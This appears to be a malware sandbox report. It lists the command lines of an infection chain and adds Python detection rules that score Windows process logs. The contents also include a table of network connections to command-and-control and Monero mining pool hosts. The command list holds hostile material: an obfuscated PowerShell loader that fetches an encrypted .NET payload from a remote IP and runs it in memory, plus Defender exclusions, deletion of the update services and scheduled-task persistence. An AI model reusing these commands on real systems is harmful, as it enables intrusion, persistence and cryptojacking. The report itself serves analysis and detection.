C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\5616.exe
C:\Users\Admin\AppData\Local\Temp\5616.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 780
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\a21aa4a2-2388-4a0c-8d42-caa3b3f83d0e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
C:\Users\Admin\AppData\Local\Temp\42FA.exe
"C:\Users\Admin\AppData\Local\Temp\42FA.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\68F3.exe
C:\Users\Admin\AppData\Local\Temp\68F3.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 780
C:\Users\Admin\AppData\Local\Temp\7420.exe
C:\Users\Admin\AppData\Local\Temp\7420.exe
C:\Users\Admin\AppData\Local\Temp\79BE.exe
C:\Users\Admin\AppData\Local\Temp\79BE.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
"C:\Users\Admin\AppData\Local\Temp\42FA.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\83B2.exe
C:\Users\Admin\AppData\Local\Temp\83B2.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $anemoneAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $undoneBasalt = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTEwMTg=')); $urledAnemone = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Y2IxYTM=')); $drollyAdopted = new-object System.Net.Sockets.TcpClient; $drollyAdopted.Connect($anemoneAccoast, [int]$undoneBasalt); $croodUndone = $drollyAdopted.GetStream(); $drollyAdopted.SendTimeout = 300000; $drollyAdopted.ReceiveTimeout = 300000; $anemoneUrled = [System.Text.StringBuilder]::new(); $anemoneUrled.AppendLine('GET /' + $urledAnemone); $anemoneUrled.AppendLine('Host: ' + $anemoneAccoast); $anemoneUrled.AppendLine(); $drollyBasalt = [System.Text.Encoding]::ASCII.GetBytes($anemoneUrled.ToString()); $croodUndone.Write($drollyBasalt, 0, $drollyBasalt.Length); $croodAnemone = New-Object System.IO.MemoryStream; $croodUndone.CopyTo($croodAnemone); $croodUndone.Dispose(); $drollyAdopted.Dispose(); $croodAnemone.Position = 0; $accoastAdopted = $croodAnemone.ToArray(); $croodAnemone.Dispose(); $adoptedUndone = [System.Text.Encoding]::ASCII.GetString($accoastAdopted).IndexOf('`r`n`r`n')+1; $urledDrolly = [System.Text.Encoding]::ASCII.GetString($accoastAdopted[$adoptedUndone..($accoastAdopted.Length-1)]); $urledDrolly = [System.Convert]::FromBase64String($urledDrolly); $adoptedTaipans = New-Object System.Security.Cryptography.AesManaged; $adoptedTaipans.Mode = [System.Security.Cryptography.CipherMode]::CBC; $adoptedTaipans.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $adoptedTaipans.Key = [System.Convert]::FromBase64String('REh1kjJGknER9Hy/8Kp1GmdthqGx+srHUlsWBbnCLIM='); $adoptedTaipans.IV = [System.Convert]::FromBase64String('biNlJbw5kJdQtvBXtmkf9A=='); $accoastBasalt = $adoptedTaipans.CreateDecryptor(); $urledDrolly = $accoastBasalt.TransformFinalBlock($urledDrolly, 0, $urledDrolly.Length); $accoastBasalt.Dispose(); $adoptedTaipans.Dispose(); $adoptedYttrium = New-Object System.IO.MemoryStream(, $urledDrolly); $urledAccoast = New-Object System.IO.MemoryStream; $yttriumTaipans = New-Object System.IO.Compression.GZipStream($adoptedYttrium, [IO.Compression.CompressionMode]::Decompress); $yttriumTaipans.CopyTo($urledAccoast); $urledDrolly = $urledAccoast.ToArray(); $anemoneBasalt = [System.Reflection.Assembly]::Load($urledDrolly); $yttriumDrolly = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dW5uZXN0U2NvdXRlcg==')); $taipansAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('YmFzYWx0QWNjb2FzdA==')); $urledAdopted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dGFpcGFuc1l0dHJpdW0=')); $urledCrood = $anemoneBasalt.GetType($yttriumDrolly + '.' + $taipansAccoast); $drollyTaipans = $urledCrood.GetMethod($urledAdopted); $drollyTaipans.Invoke($undoneUrled, (, [string[]] (''))); #($undoneUrled, $undoneUrled);
C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe
"C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe"
C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build3.exe
"C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build3.exe"
C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe
"C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 788
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 780
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Users\Admin\AppData\Local\Temp\D202.exe
C:\Users\Admin\AppData\Local\Temp\D202.exe
C:\ProgramData\21184250497844656502.exe
"C:\ProgramData\21184250497844656502.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1E46.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 1912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4760 -s 2448
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
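Taken together, the command lines above form a recognisable preparation sequence of the kind that typically precedes a coin miner (this report's Network table does show connections to xmr-eu1 and xmr-eu2.nanopool.org): a Defender exclusion over the whole user profile and Program Files, stopping and then deleting the Windows Update, WaaSMedic, BITS and Delivery Optimization services so nothing repairs the machine, zeroing the standby and hibernate timeouts so the host never sleeps, an every-minute scheduled task pointing into AppData, a SYSTEM-level startup task for a fake updater under Program Files, and timeout-then-del self-removal. The Python below is an added example, not part of the report, showing how to turn those lines into command-line detection rules over Security 4688 or Sysmon Event ID 1 CommandLine fields and score a host by how many distinct techniques co-occur. The malicious sample lines are copied from the process list (the Register-ScheduledTask one is shortened to its relevant clause), the benign ones are constructed noise, and the scoring thresholds are an assumption to tune locally.

```python
"""Command-line detection rules for the tampering sequence listed above (added example)."""
import re
from collections import Counter
from typing import Dict, List, Tuple

RULES: Dict[str, "re.Pattern[str]"] = {
    # Defender exclusion covering the whole profile and Program Files.
    "defender_exclusion": re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I),
    # Stopping, then deleting, the update / BITS / delivery-optimisation services.
    "update_service_stop": re.compile(
        r"\bsc(?:\.exe)?\s+stop\s+(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I),
    "update_service_delete": re.compile(
        r'\breg(?:\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\'
        r"(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I),
    # Sleep and hibernation disabled so a miner keeps running; value must be exactly 0.
    "sleep_disabled": re.compile(
        r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", re.I),
    # Every-minute task whose action lives under AppData.
    "minute_task_appdata": re.compile(
        r'/create\b.*?/sc\s+minute\s+/mo\s+1\b.*?/tr\s+"?[^"]*\\AppData\\', re.I),
    # Highest-privilege SYSTEM task registered at startup from PowerShell.
    "system_startup_task": re.compile(
        r"Register-ScheduledTask\b.*-AtStartup\b.*-User\s+'System'.*-RunLevel\s+'Highest'", re.I),
    # Delay-then-delete self-removal through cmd.
    "self_delete": re.compile(r"\btimeout\s+/t\s+\d+\s*&\s*del\s+/f\s+/q\b", re.I),
}

# Constructed sample: CommandLine values as a 4688/Sysmon collector would hand them over.
# The first seven are copied from the process list on this page (one shortened to the
# clause that matters); BENIGN_CMDLINES are made up to show what must not fire.
SAMPLE_CMDLINES: List[str] = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    r"sc stop WaaSMedicSvc",
    r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f',
    r"powercfg /x -standby-timeout-ac 0",
    r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"',
    r"Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force",
    r'"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1E46.exe" & exit',
]
BENIGN_CMDLINES: List[str] = [
    r"C:\Windows\System32\svchost.exe -k netsvcs -p -s wuauserv",
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer',
    r"powercfg /x -standby-timeout-ac 30",
    r'schtasks /create /sc daily /tn Backup /tr "C:\Program Files\Backup\backup.exe"',
    r"sc query wuauserv",
]

def scan(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, cmdline) for every rule that fires on every line."""
    return [(name, line) for line in cmdlines for name, rx in RULES.items() if rx.search(line)]

def score(hits: List[Tuple[str, str]]) -> Tuple[str, Counter]:
    """Rate a host by distinct techniques, not raw hit count: an admin really may add
    one exclusion, but the combination seen on this page is the preparation set.
    Thresholds are an assumption; tune them against local baseline noise."""
    counts = Counter(name for name, _ in hits)
    distinct = len(counts)
    level = "high" if distinct >= 3 else "medium" if distinct == 2 else "low" if distinct else "none"
    return level, counts

if __name__ == "__main__":
    for name, line in scan(SAMPLE_CMDLINES):
        print(f"{name:22} {line[:90]}")
    print("verdict:", score(scan(SAMPLE_CMDLINES))[0], "| benign:", score(scan(BENIGN_CMDLINES))[0])
```

The rules key on the argument shapes rather than on image names because the same actions reach sc.exe, reg.exe and powercfg.exe through cmd /c wrappers here, and on the Amadey task line the schtasks image does not even appear in the logged command line. Correlating by parent process or by a short time window before scoring would tighten this further; the page does not carry parent PIDs, so the example scores a flat list.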
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 188.114.96.0:80 | potunulit.org | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leaderspro.ps | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| US | 8.8.8.8:53 | 14.242.73.109.in-addr.arpa | udp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| EE | 91.235.234.235:80 | | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.220.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 82.117.255.127:80 | 82.117.255.127 | tcp |
| US | 8.8.8.8:53 | 127.255.117.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| HK | 103.100.211.218:80 | bz.bbbeioaag.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| AT | 77.73.134.27:80 | 77.73.134.27 | tcp |
| US | 8.8.8.8:53 | 27.134.73.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| NL | 5.252.118.57:80 | 5.252.118.57 | tcp |
| US | 8.8.8.8:53 | 57.118.252.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.13.109.52.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| HU | 84.224.34.240:80 | colisumy.com | tcp |
| KR | 123.140.161.243:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 240.34.224.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.161.140.123.in-addr.arpa | udp |
| KR | 123.140.161.243:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 157.240.5.12:443 | adsmanager.facebook.com | tcp |
| US | 8.8.8.8:53 | 12.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| DE | 157.240.20.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 35.20.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count.iiagjaggg.com | udp |
| HK | 154.221.31.191:80 | count.iiagjaggg.com | tcp |
| US | 8.8.8.8:53 | 191.31.221.154.in-addr.arpa | udp |
| RU | 91.215.85.198:51018 | 91.215.85.198 | tcp |
| US | 8.8.8.8:53 | 198.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aapu.at | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 118.146.170.187.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| CZ | 146.19.173.221:80 | 146.19.173.221 | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.55.52.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.175.53.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.173.19.146.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | fakethedead.com | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| BZ | 78.142.29.185:443 | fakethedead.com | tcp |
| DE | 116.203.2.149:11111 | 116.203.2.149 | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 185.29.142.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.2.203.116.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | janjackfrs.com | udp |
| RU | 45.143.137.122:80 | janjackfrs.com | tcp |
| US | 8.8.8.8:53 | hoh0aeghwugh2gie.com | udp |
| N/A | 185.161.248.41:80 | hoh0aeghwugh2gie.com | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 41.248.161.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 31.13.26.104.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 121.252.72.23.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 51.255.34.80:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 80.34.255.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 135.125.238.108:14433 | xmr-eu1.nanopool.org | tcp |
